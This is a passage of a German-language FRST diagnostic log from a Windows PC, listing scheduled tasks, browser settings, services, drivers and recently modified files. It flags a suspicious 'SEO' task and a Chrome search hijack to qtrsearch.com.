- System32\Tasks\OneDrive Reporting Task-S-1-5-21-1221853621-2447620182-1933698513-1001 => C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe [4209168 2024-07-20] (Microsoft Corporation -> Microsoft Corporation) Task: {46979F62-4655-4018-955E-9BF1D88DDF97} - System32\Tasks\OneDrive Reporting Task-S-1-5-21-1221853621-2447620182-1933698513-1002 => C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe [4209168 2024-07-20] (Microsoft Corporation -> Microsoft Corporation) Task: {64E3E2E2-E8DF-4744-BD6F-EF5E97162EE2} - System32\Tasks\Opera GX scheduled assistant Autoupdate 1693322873 => C:\Users\skysc\AppData\Local\Programs\Opera GX\launcher.exe [2273696 2024-06-18] (Opera Norway AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\skysc\AppData\Local\Programs\Opera GX\assistant" $(Arg0) Task: 
{CF648919-4154-44DE-BFE9-9DF87ED8EC9C} - System32\Tasks\Opera GX scheduled Autoupdate 1691520674 => C:\Users\skysc\AppData\Local\Programs\Opera GX\launcher.exe [2273696 2024-06-18] (Opera Norway AS -> Opera Software) Task: {EBAC0C4B-4BF7-483A-BD3B-1E4EB3E0E848} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Common Files\Overwolf\OverwolfUpdater.exe [2369544 2024-07-08] (Overwolf Ltd -> Overwolf LTD) -> C:\Program Files (x86)\Overwolf\/RunningFrom Schedule Task: {1BC7AD52-96F9-4C93-AC9B-BFE2E3FFC697} - System32\Tasks\PowerToys\Autorun for skysc => C:\Program Files\PowerToys\PowerToys.exe [1194016 2024-05-26] (Microsoft Corporation -> Microsoft Corporation) Task: {1BF364AE-DAB2-4D3F-9DAC-3D957CB25BD6} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton 360 for Gamers\Upgrade.exe [2353000 2024-03-04] (NortonLifeLock Inc. -> NortonLifeLock Inc.) Task: {8B4CA8A8-BDAC-4447-9FE7-4ABA29333A32} - System32\Tasks\SEO => C:\Users\skysc\AppData\Roaming\SEO\SEO.exe (Keine Datei) <==== ACHTUNG (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.) Task: C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job => C:\Windows\explorer.exe ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.) Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.) Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.) 
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 Tcpip\..\Interfaces\{9d3406a1-6456-4e84-a9a3-a377cf7e7013}: [DhcpNameServer] 192.168.2.1 Tcpip\..\Interfaces\{9d3406a1-6456-4e84-a9a3-a377cf7e7013}: [DhcpDomain] Speedport_W_724V_09011603_06_010 Edge: ======= Edge DefaultProfile: Profile 1 Edge Profile: C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Default [2024-07-19] Edge NewTab: Default -> Active:"chrome-extension://fepbfegljfpfclgajmjlmnhdillncgke/newtabHTML.html" Edge Extension: (Google Docs Offline) - C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2024-07-19] Edge Extension: (Edge relevant text changes) - C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha [2024-07-19] Edge Profile: C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1 [2024-07-22] Edge HomePage: Profile 1 -> hxxp://www.google.com/ Edge NewTab: Profile 1 -> Active:"chrome-extension://fepbfegljfpfclgajmjlmnhdillncgke/newtabHTML.html" Edge DefaultSearchURL: Profile 1 -> hxxps://www.bing.com/search?PC=U523&q={searchTerms} Edge Extension: (Microsoft Rewards) - C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1\Extensions\bnplfnhcidhhdapmblniehfaaompjlck [2024-07-19] Edge Extension: (Beautiful New Tab) - C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1\Extensions\fepbfegljfpfclgajmjlmnhdillncgke [2024-07-22] Edge Extension: (Google Docs Offline) - C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2024-07-19] Edge Extension: (Edge relevant text changes) - C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha [2024-07-19] FireFox: ======== FF Plugin: @videolan.org/vlc,version=3.0.18 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2023-10-30] (VideoLAN -> VideoLAN) FF Plugin: @videolan.org/vlc,version=3.0.20 -> C:\Program 
Files\VideoLAN\VLC\npvlc.dll [2023-10-30] (VideoLAN -> VideoLAN)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2022-06-22] (Microsoft Corporation -> Microsoft Corporation)

Chrome:
=======
CHR Profile: C:\Users\skysc\AppData\Local\Google\Chrome\User Data\Default [2024-07-22]
CHR DefaultSearchURL: Default -> hxxps://qtrsearch.com/search?q={searchTerms}&s=rg&u=%USERID%
CHR DefaultSearchKeyword: Default -> qtr
CHR DefaultSuggestURL: Default -> hxxps://qtrsearch.com/suggest?q={searchTerms}
CHR Extension: (the web) - C:\Users\skysc\AppData\Local\Google\Chrome\User Data\Default\Extensions\gdamghfpmkabflbpldhdpbbfofolgaji [2024-07-22]
CHR Extension: (Google Docs Offline) - C:\Users\skysc\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2024-05-27]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\skysc\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2024-05-27]

Opera:
=======
StartMenuInternet: (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001) Opera GXStable - "C:\Users\skysc\AppData\Local\Programs\Opera GX\Launcher.exe"

Brave:
=======
BRA Profile: C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default [2024-07-20]
BRA Extension: (Brave Ad Block Updater (Brave Ad Block First Party Filters (plaintext))) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\adcocjohghhfpidemphmcmlmhnfgikei [2024-07-20]
BRA Extension: (Brave Local Data Files Updater) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal [2024-07-20]
BRA Extension: (Brave NTP background images) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\aoojcmojmmcbpfgoecoadbdpnagfchel [2024-04-14]
BRA Extension: (Brave Ads Resources) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\bbefpembgddgdihpkcidgdgiojjlchji [2024-04-14]
BRA Extension: (Brave Ad Block Updater (Fanboy's Mobile Notifications (plaintext))) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\bfpgedeaaibpoidldhjcknekahbikncb [2024-07-20]
BRA Extension: (Brave Ad Block Updater (EasyList Cookie (plaintext))) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\cdbbhgbmjhfnhnmgeddbliobbofkgdhe [2024-07-20]
BRA Extension: (Brave Ad Block Updater (Regional Catalog)) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\gkboaolpopklhgplhaaiboijnklogmbc [2024-07-20]
BRA Extension: (Brave NTP Super Referrer mapping table) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\heplpbhjcbmiibdlchlanmdenffpiibo [2024-04-14]
BRA Extension: (Brave Ad Block Updater (Brave Ad Block Updater (plaintext))) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\iodkpdagapdfkphljnddpjlldadblomo [2024-07-20]
BRA Extension: (Brave Ads Resources) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\jcncoheihebhhiemmbmpfhkceomfipbj [2024-07-20]
BRA Extension: (Brave Ad Block Updater (EasyList Germany (plaintext))) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\lfmefmifdjlfneapckmpkinmlofjehbp [2024-07-20]
BRA Extension: (Brave Ad Block Updater (Resources)) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\mfddibmblmbccpadfndgakiopmmhebop [2024-07-20]
BRA Extension: (Brave NTP sponsored images) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\obbokncgfcbepeipkhpdepjjoncelefj [2024-07-20]

==================== Dienste (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [177392 2023-09-14] (RealDefense, LLC -> SUPERAntiSpyware.com) S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [15772456 2023-12-03] (BattlEye Innovations e.K. -> ) S2 brave; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [166424 2024-04-14] (Brave Software, Inc. -> BraveSoftware Inc.) S3 BraveElevationService; C:\Program Files\BraveSoftware\Brave-Browser\Application\126.1.67.134\elevation_service.exe [2688024 2024-07-17] (Brave Software, Inc. -> Brave Software, Inc.) S3 bravem; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [166424 2024-04-14] (Brave Software, Inc. -> BraveSoftware Inc.) R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11988424 2022-05-20] (Microsoft Corporation -> Microsoft Corporation) S3 ComboCleaner.Guard; C:\Program Files (x86)\Combo Cleaner\ComboCleaner.Guard.exe [144616 2024-06-04] (RCS LT UAB -> RCS LT) S3 ComboCleaner.WinService; C:\Program Files (x86)\Combo Cleaner\ComboCleaner.WinService.exe [152296 2024-06-04] (RCS LT UAB -> RCS LT) R2 Easy Connection to Screen; C:\Program Files\Samsung\Easy Connection to Screen\Service.exe [367816 2023-01-13] (Samsung Electronics CO., LTD. -> ) S3 EasyAntiCheat_EOS; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe [955816 2023-10-01] (EasyAntiCheat Oy -> Epic Games, Inc.) S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [934368 2022-03-03] (Epic Games Inc. -> Epic Games, Inc.) S3 FileSyncHelper; C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncHelper.exe [3522992 2024-07-20] (Microsoft Corporation -> Microsoft Corporation) S3 Futuremark SystemInfo Service; C:\Program Files (x86)\Futuremark\SystemInfo\FMSISvc.exe [347408 2023-11-30] (Underwriters Laboratories Inc. 
-> Futuremark) R2 LightKeeperService; C:\Program Files (x86)\MSI\MSI Center\Mystic Light\LightKeeperService.exe [92768 2023-05-10] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [8901528 2024-07-01] (Malwarebytes Inc. -> Malwarebytes) S3 MBVpnTunnelService; C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe [3073888 2024-06-04] (Malwarebytes Inc. -> Malwarebytes) R2 MDCoreSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpDefenderCoreService.exe [1377416 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation) R2 MSIREGISTER_MR; C:\Program Files (x86)\MSI\MSIRegister\MSIRegisterService.exe [2019504 2019-08-28] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) R2 MSI_Case_Service; C:\Program Files (x86)\MSI\MSI Center\Case\MSI_Case_Service.exe [74336 2023-07-10] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) R2 MSI_Center_Service; C:\Program Files (x86)\MSI\MSI Center\MSI_Central_Service.exe [154216 2023-08-17] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) R2 MSI_Companion_Service; C:\Program Files (x86)\MSI\MSI Center\Game Highlights\MSI_Companion_Service.exe [142648 2021-04-08] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) R2 MSI_Super_Charger_Service; C:\Program Files (x86)\MSI\MSI Center\Super Charger\MSI_Super_Charger_Service.exe [37104 2022-05-13] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI) R2 MSI_VoiceControl_Service; C:\Program Files (x86)\MSI\MSI Center\Voice Control\VoiceControl_Service.exe [36880 2023-04-27] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) R2 Mystic_Light_Service; C:\Program Files (x86)\MSI\MSI Center\Mystic Light\Mystic_Light_Service.exe [37616 2022-04-28] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) 
R2 NortonSecurity; C:\Program Files\Norton Security\Engine\22.24.2.6\NortonSecurity.exe [344888 2024-03-04] (NortonLifeLock Inc. -> NortonLifelock Inc.) R2 nsWscSvc; C:\Program Files\Norton Security\Engine\22.24.2.6\nsWscSvc.exe [1059176 2024-03-04] (NortonLifeLock Inc. -> NortonLifeLock Inc.) R2 NVDisplay.ContainerLocalSystem; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_493585427225c794\Display.NvContainer\NVDisplay.Container.exe [1275528 2024-02-08] (NVIDIA Corporation -> NVIDIA Corporation) S3 OneDrive Updater Service; C:\Program Files\Microsoft OneDrive\24.132.0701.0002\OneDriveUpdaterService.exe [3864080 2024-07-20] (Microsoft Corporation -> Microsoft Corporation) S3 OverwolfUpdater; C:\Program Files (x86)\Common Files\Overwolf\OverwolfUpdater.exe [2369544 2024-07-08] (Overwolf Ltd -> Overwolf LTD) R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\NisSrv.exe [3236728 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation) R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MsMpEng.exe [133688 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation) S2 DFWSIDService; C:\ProgramData\Wondershare\wsServices\WsidService.exe [X] S2 ElevationService; C:\ProgramData\Wondershare\wsServices\ElevationService.exe [X] S4 EsgShKernel; "C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe" [X] S2 ShMonitor; "C:\Program Files\EnigmaSoft\SpyHunter\ShMonitor.exe" [X] S2 WirelessBackupService; C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone Basic - Deutsch\Addins\Recovery\WirelessBackupService.exe [X] S2 Wondershare InstallAssist; C:\ProgramData\Wondershare\Service\InstallAssistService.exe [X] ===================== Treiber (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) 
R3 AmdTools64; C:\Windows\System32\drivers\AmdTools64.sys [63392 2020-06-16] (Microsoft Windows Hardware Compatibility Publisher -> ) S3 AppleKmdfFilter; C:\Windows\System32\drivers\AppleKmdfFilter.sys [39272 2023-06-27] (Apple Inc. -> Apple Inc.) S3 AppleLowerFilter; C:\Windows\System32\drivers\AppleLowerFilter.sys [55608 2023-06-27] (Apple Inc. -> Apple Inc.) S3 BdDci; C:\Windows\system32\DRIVERS\bddci.sys [800672 2023-10-27] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender) R1 BHDrvx64; C:\Program Files\Norton Security\NortonData\22.23.5.106\Definitions\BASHDefs\20231204.001\BHDrvx64.sys [1706512 2023-09-28] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom) S3 BthA2dp; C:\Windows\System32\drivers\BthA2dp.sys [532480 2022-05-07] (Microsoft Corporation) [Datei ist nicht signiert] S3 BthHFEnum; C:\Windows\System32\drivers\bthhfenum.sys [184320 2022-05-07] (Microsoft Corporation) [Datei ist nicht signiert] S3 BTHMODEM; C:\Windows\System32\drivers\bthmodem.sys [106496 2022-05-07] (Microsoft Corporation) [Datei ist nicht signiert] R1 ccSet_NGC; C:\Windows\System32\drivers\NGCx64\1618020.006\ccSetx64.sys [198288 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom) S3 CH341SER_A64; C:\Windows\System32\Drivers\CH341S64.SYS [84640 2023-03-21] (Microsoft Windows Hardware Compatibility Publisher -> wch.cn) R1 CTIIO; C:\Windows\system32\drivers\CtiIo64.sys [32296 2023-08-18] (Microsoft Windows Hardware Compatibility Publisher -> Creative Technology Innovation Co., LTd.) 
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [527832 2023-08-06] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom) S3 EnigmaFileMonDriver; C:\Windows\system32\Drivers\EnigmaFileMonDriver.sys [88736 2024-07-18] (Microsoft Windows Hardware Compatibility Publisher -> EnigmaSoft Limited) R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [159720 2023-08-07] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom) S3 gdrv3; C:\Windows\System32\drivers\gdrv3.sys [45248 2023-08-18] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.) S3 gzflt; C:\Windows\System32\DRIVERS\gzflt.sys [177056 2021-10-10] (Microsoft Windows Hardware Compatibility Publisher -> BitDefender LLC) R1 IDSVia64; C:\Program Files\Norton Security\NortonData\22.23.5.106\Definitions\IPSDefs\20231201.064\IDSvia64.sys [1554400 2023-10-19] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom) S3 ipadtst2; C:\ProgramData\MSI\Super_Charger\ipadtst2_64.sys [26168 2021-01-12] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI) R2 mbamchameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [221264 2024-07-15] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes) S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [21480 2024-06-04] (Microsoft Windows Early Launch Anti-Malware Publisher -> Malwarebytes) R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [239576 2024-07-15] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes) R1 MSIO; C:\Windows\system32\drivers\MsIo64.sys [19000 2023-04-05] (Microsoft Windows Hardware Compatibility Publisher -> MICSYS Technology Co., LTd) S3 Netaapl; C:\Windows\System32\drivers\netaapl64.sys [23040 2023-08-09] (Microsoft Windows Hardware Compatibility Publisher -> Apple Inc.) S3 nsvst_NGC; C:\Windows\System32\drivers\NGCx64\1618020.006\nsvst.sys [57120 2024-03-04] (NortonLifeLock Inc. 
-> NortonLifeLock Inc.) R3 NTIOLib_CC_Clock; C:\Program Files (x86)\MSI\MSI Center\Lib\NTIOLib_X64.sys [14288 2017-07-10] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI) R3 NTIOLib_CC_COMM; C:\Program Files (x86)\MSI\MSI Center\Lib\SYS\NTIOLib_X64.sys [32424 2023-07-31] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI) R3 NTIOLib_CC_CPU; C:\Program Files (x86)\MSI\MSI Center\Super Charger\NTIOLib_X64.sys [14288 2017-07-10] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI) R3 NTIOLib_MysticLight; C:\Program Files (x86)\MSI\MSI Center\Mystic Light\Lib\NTIOLib_X64.sys [32488 2023-11-20] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI) R3 NvModuleTracker; C:\Windows\System32\DriverStore\FileRepository\nvmoduletracker.inf_amd64_0c1cc60a4b422185\NvModuleTracker.sys [45656 2022-07-14] (Nvidia Corporation -> NVIDIA Corporation) R3 rt68cx21; C:\Windows\System32\DriverStore\FileRepository\rt68cx21x64.inf_amd64_e41dba7ae72d1e1a\rt68cx21x64.sys [458168 2021-10-05] (Microsoft Windows Hardware Compatibility Publisher -> Realtek) S3 rtcx21; C:\Windows\System32\DriverStore\FileRepository\rtcx21x64.inf_amd64_516e5c9b75c49dc2\rtcx21x64.sys [539648 2022-05-06] (Microsoft Windows -> Realtek) S1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [18160 2023-08-25] (RealDefense, LLC -> SUPERAdBlocker.com and SUPERAntiSpyware.com) S1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [15600 2023-08-25] (RealDefense, LLC -> SUPERAdBlocker.com and SUPERAntiSpyware.com) R3 SRTSP; C:\Windows\System32\drivers\NGCx64\1618020.006\SRTSP64.SYS [960640 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom) R1 SRTSPX; C:\Windows\System32\drivers\NGCx64\1618020.006\SRTSPX64.SYS [52864 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom) R0 SymEFASI; C:\Windows\System32\drivers\NGCx64\1618020.006\SYMEFASI64.SYS [2180248 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom) S0 SymELAM; 
C:\Windows\System32\drivers\NGCx64\1618020.006\SymELAM.sys [36016 2024-03-04] (Microsoft Windows Early Launch Anti-Malware Publisher -> Broadcom) R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [100328 2023-08-07] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom) R3 SymEvnt; C:\Program Files\Norton Security\NortonData\22.23.5.106\SymPlatform\SymEvnt.sys [722400 2022-06-28] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom) R1 SymIRON; C:\Windows\System32\drivers\NGCx64\1618020.006\Ironx64.SYS [306872 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom) R1 SymNetS; C:\Windows\System32\drivers\NGCx64\1618020.006\symnets.sys [492720 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom) S3 Trufos; C:\Windows\System32\DRIVERS\Trufos.sys [633264 2022-04-16] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender) S3 UsbNcm; C:\Windows\System32\drivers\UsbNcm.sys [167936 2023-11-15] (Microsoft Windows -> ) S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [21968 2024-07-16] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation) U5 WdDevFlt; C:\Windows\System32\Drivers\WdDevFlt.sys [169232 2022-05-07] (Microsoft Windows -> Microsoft Corporation) R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [602520 2024-07-16] (Microsoft Windows -> Microsoft Corporation) R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [105864 2024-07-16] (Microsoft Windows -> Microsoft Corporation) S3 wpCtrlDrv_NGC; C:\Windows\System32\drivers\NGCx64\1618020.006\wpCtrlDrv.sys [1016792 2024-03-04] (NortonLifeLock Inc. -> NortonLifeLock Inc.) ==================== NetSvcs (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) 
==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) ========= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2024-07-22 16:20 - 2024-07-22 16:20 - 000720948 _____ C:\Windows\system32\perfh007.dat 2024-07-15 17:37 - 2024-07-15 17:37 - 000000214 _____ C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job 2024-07-09 20:41 - 2024-07-09 20:41 - 000025684 _____ C:\Windows\system32\IntegratedServicesRegionPolicySet.json ==================== Ein Monat (geänderte) ================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2024-07-22 21:18 - 2024-05-27 21:26 - 000000000 ____D C:\FRST 2024-07-22 21:18 - 2022-05-07 07:24 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2024-07-22 21:16 - 2024-06-04 17:30 - 000000000 ____D C:\Users\skysc\AppData\Local\Malwarebytes 2024-07-22 21:14 - 2023-08-08 19:27 - 000000000 ____D C:\Users\skysc\AppData\Local\Norton 2024-07-22 21:13 - 2023-08-07 15:06 - 000000000 ____D C:\Program Files (x86)\Steam 2024-07-22 20:53 - 2023-08-08 23:11 - 000000000 ____D C:\Users\skysc\AppData\Roaming\vlc 2024-07-22 20:52 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\SystemTemp 2024-07-22 19:50 - 2023-08-09 20:01 - 000000000 ____D C:\Users\skysc\OneDrive\Microsoft Edge Drop Files\Dokumente\Audioaufzeichnungen 2024-07-22 19:02 - 2023-11-11 18:24 - 000000000 ____D C:\Users\skysc\AppData\Roaming\discord 2024-07-22 18:54 - 2023-08-07 14:18 - 000000000 ____D C:\Users\skysc\AppData\Local\D3DSCache 2024-07-22 17:02 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\AppReadiness 2024-07-22 16:20 - 2022-06-22 10:23 - 001662900 _____ C:\Windows\system32\PerfStringBackup.INI 2024-07-22 16:20 - 2022-05-07 07:22 - 000000000 ____D C:\Windows\INF 2024-07-22 16:18 - 2024-04-02 21:44 - 000000000 ____D C:\Windows\system32\Tasks\Norton 360 2024-07-22 16:12 - 2023-09-19 15:17 - 000000000 ____D C:\Users\skysc\AppData\Local\Overwolf 2024-07-22 16:12 - 
2023-08-07 14:12 - 000000000 ___RD C:\Users\skysc\OneDrive 2024-07-22 16:11 - 2024-06-09 14:12 - 000000000 ____D C:\Windows\system32\Tasks\PowerToys 2024-07-22 16:11 - 2023-08-21 17:42 - 000000000 ____D C:\Users\skysc\AppData\Local\CrashDumps 2024-07-22 16:11 - 2022-06-22 10:35 - 000000000 ____D C:\ProgramData\NVIDIA 2024-07-22 16:11 - 2022-06-22 10:16 - 000012288 ___SH C:\DumpStack.log.tmp 2024-07-22 16:11 - 2022-06-22 10:16 - 000000006 ____H C:\Windows\Tasks\SA.DAT 2024-07-22 16:10 - 2022-05-07 07:17 - 000786432 _____ C:\Windows\system32\config\BBI 2024-07-22 16:06 - 2023-08-07 17:42 - 000000000 ____D C:\Users\skysc\AppData\Roaming\.minecraft 2024-07-22 15:43 - 2023-08-07 14:12 - 000000000 ____D C:\Users\skysc 2024-07-22 14:42 - 2022-05-07 07:17 - 000032768 _____ C:\Windows\system32\config\ELAM 2024-07-21 16:39 - 2022-06-22 10:16 - 000000000 ____D C:\Windows\system32\SleepStudy 2024-07-20 21:46 - 2022-05-07 07:24 - 000000000 ___HD C:\Program Files\WindowsApps 2024-07-20 21:23 - 2024-06-02 18:45 - 000001607 _____ C:\Windows\system32\config\VSMIDK 2024-07-20 21:23 - 2023-08-08 14:20 - 000000000 ____D C:\Program Files\Microsoft OneDrive 2024-07-20 17:58 - 2022-06-22 10:18 - 000000000 ____D C:\ProgramData\Packages 2024-07-20 15:58 - 2023-08-07 17:35 - 000000000 ____D C:\XboxGames 2024-07-20 15:58 - 2023-08-07 14:18 - 000000000 ____D C:\Users\skysc\AppData\Local\Packages 2024-07-20 15:31 - 2023-11-09 14:14 - 000003596 _____ C:\Windows\system32\Tasks\OneDrive Reporting Task-S-1-5-21-1221853621-2447620182-1933698513-1002 2024-07-20 15:31 - 2023-08-07 14:20 - 000003596 _____ C:\Windows\system32\Tasks\OneDrive Reporting Task-S-1-5-21-1221853621-2447620182-1933698513-1001 2024-07-20 15:31 - 2022-06-22 10:19 - 000003194 _____ C:\Windows\system32\Tasks\OneDrive Per-Machine Standalone Update Task 2024-07-20 15:31 - 2022-06-22 10:19 - 000002155 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2024-07-20 14:52 - 2024-05-27 21:44 - 000000000 ____D 
